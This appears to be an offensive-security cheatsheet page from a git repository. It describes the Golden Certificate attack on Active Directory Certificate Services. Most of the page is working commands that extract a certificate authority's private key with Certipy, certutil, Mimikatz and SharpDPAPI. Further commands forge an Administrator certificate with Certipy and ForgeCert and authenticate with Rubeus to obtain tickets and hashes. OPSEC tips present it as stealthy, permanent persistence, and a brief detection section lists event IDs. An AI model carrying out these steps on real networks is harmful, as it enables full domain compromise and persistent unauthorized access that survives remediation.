daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-35-golden-certificate-attack.md (5746B)


      1 ---
      2 title: "Attack #35 β€” Golden Certificate Attack"
      3 description: "The Golden Certificate attack is the ADCS equivalent of a Golden Ticket. By stealing the Certificate Authority's private key and CA certificate, an…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "kerberos"]
      7 tools: ["Mimikatz", "Rubeus", "Certipy", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/🟒 Attack #35 β€” Golden Certificate Attack.md"
     11 ---
     12 # 🟒 Attack #35 β€” Golden Certificate Attack
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 The Golden Certificate attack is the **ADCS equivalent of a Golden Ticket**. By stealing the Certificate Authority's **private key** and **CA certificate**, an attacker can **forge certificates for any user** entirely offline β€” without ever touching the CA again. These forged certificates are indistinguishable from legitimate ones because they're signed by the real CA private key.
     19 
     20 ### Impact
     21 
     22 - **Forge certificates for any user** β€” DA, EA, service accounts
     23 - **Completely offline** β€” no CA interaction needed after key theft
     24 - **Survives** password resets, KRBTGT rotation, and most remediation
     25 - **Only remediation**: revoke the CA certificate and rebuild the PKI
     26 
     27 ***
     28 
     29 ## βš™οΈ Prerequisites
     30 
     31 | Requirement | Detail |
     32 |---|---|
     33 | **Local admin on CA server** | To extract the CA private key |
     34 | **CA private key exportable** | Default in most deployments |
     35 | **Or**: backup of CA key | From `certutil -backup` or DPAPI extraction |
     36 
     37 ***
     38 
     39 ## πŸ› οΈ Tools
     40 
     41 | Tool | Platform | Notes |
     42 |---|---|---|
     43 | **Certipy** | Linux | `backup` command to extract CA key + cert |
     44 | **SharpDPAPI** | Windows | DPAPI-based CA key extraction |
     45 | **Mimikatz** | Windows | `crypto::capi` / `crypto::cng` for CA key export |
     46 | **certutil** | Windows | Native CA backup |
     47 | **ForgeCert** | Windows | Forge certificates using stolen CA key |
     48 
     49 ***
     50 
     51 ## πŸ’» Full Commands
     52 
     53 ### πŸ”΄ Step 1 β€” Extract CA Private Key
     54 
     55 ```bash
     56 # ── Certipy backup (from Linux β€” requires admin on CA) ────────────────────────
     57 certipy ca -u Administrator@corp.local -p 'Password1' \
     58   -ca CORP-CA -backup -dc-ip 10.10.10.10
     59 # Outputs: CORP-CA.pfx (contains CA certificate + private key)
     60 ```
     61 
     62 ```powershell
     63 # ── certutil (on the CA server) ───────────────────────────────────────────────
     64 certutil -backup C:\Temp\ca_backup p@ssword
     65 # Exports CA cert + key to C:\Temp\ca_backup\
     66 
     67 # ── Mimikatz β€” export CA key ──────────────────────────────────────────────────
     68 privilege::debug
     69 crypto::capi
     70 crypto::certificates /export /systemstore:LOCAL_MACHINE
     71 
     72 # ── SharpDPAPI β€” extract from DPAPI-protected store ──────────────────────────
     73 .\SharpDPAPI.exe certificates /machine
     74 ```
     75 
     76 ### πŸ”΄ Step 2 β€” Forge Certificate for Any User
     77 
     78 ```bash
     79 # ── Certipy β€” forge certificate as Administrator ─────────────────────────────
     80 certipy forge -ca-pfx CORP-CA.pfx -upn Administrator@corp.local \
     81   -subject 'CN=Administrator,CN=Users,DC=corp,DC=local'
     82 # Output: forged_administrator.pfx
     83 
     84 # ── Authenticate ──────────────────────────────────────────────────────────────
     85 certipy auth -pfx forged_administrator.pfx -dc-ip 10.10.10.10
     86 # Returns Administrator NT hash + TGT
     87 ```
     88 
     89 ```powershell
     90 # ── ForgeCert (Windows) ───────────────────────────────────────────────────────
     91 .\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "p@ssword" \
     92   --Subject "CN=Administrator,CN=Users,DC=corp,DC=local" \
     93   --SubjectAltName "Administrator@corp.local" \
     94   --NewCertPath forged.pfx --NewCertPassword "FakePass"
     95 
     96 # Use Rubeus for PKINIT authentication
     97 .\Rubeus.exe asktgt /user:Administrator /certificate:forged.pfx \
     98   /password:FakePass /ptt
     99 ```
    100 
    101 ***
    102 
    103 ## 🎯 OPSEC Tips
    104 
    105 - **Golden Certificate = permanent, stealthy persistence** β€” harder to remediate than Golden Ticket
    106 - **CA key theft requires CA server admin access** β€” this is a post-DA persistence technique
    107 - **Unlike Golden Ticket, KRBTGT rotation does NOT invalidate Golden Certificates**
    108 - **Only fix**: full PKI rebuild β€” revoke old CA cert, issue new one, re-enroll all certificates
    109 
    110 ***
    111 
    112 ## πŸ›‘οΈ Detection β€” Event IDs
    113 
    114 | Event ID | Source | What to Look For |
    115 |---|---|---|
    116 | **4768** | Security Log (DC) | PKINIT authentication with certificates not in CA database |
    117 | **4886/4887** | Security Log (CA) | Missing β€” forged certs bypass CA logging entirely |
    118 
    119 **Key detection challenge:** The CA never issued the forged certificate, so there's no enrollment event. Detection must focus on **PKINIT authentication events** where the presented certificate serial number doesn't exist in the CA's issued certificate database.
    120 
    121 ***
    122 
    123 ## πŸ”— Attack Chain Context
    124 
    125 ```
    126 [Golden Certificate] ──→ Permanent Domain Persistence via PKI
    127          β”‚
    128          β”œβ”€β”€β†’ πŸ”’ Survives: password resets, KRBTGT rotation, DA removal
    129          β”œβ”€β”€β†’ πŸ’€ Only remediation: full PKI rebuild
    130          β”œβ”€β”€β†’ πŸ”— Prereqs: admin on CA server (via DA)
    131          └──→ πŸ“Š Persistence ranking: Golden Certificate > Golden Ticket
    132 ```
    133 
    134 ***
    135 
    136 > βœ… **Attack #35 β€” Golden Certificate complete.**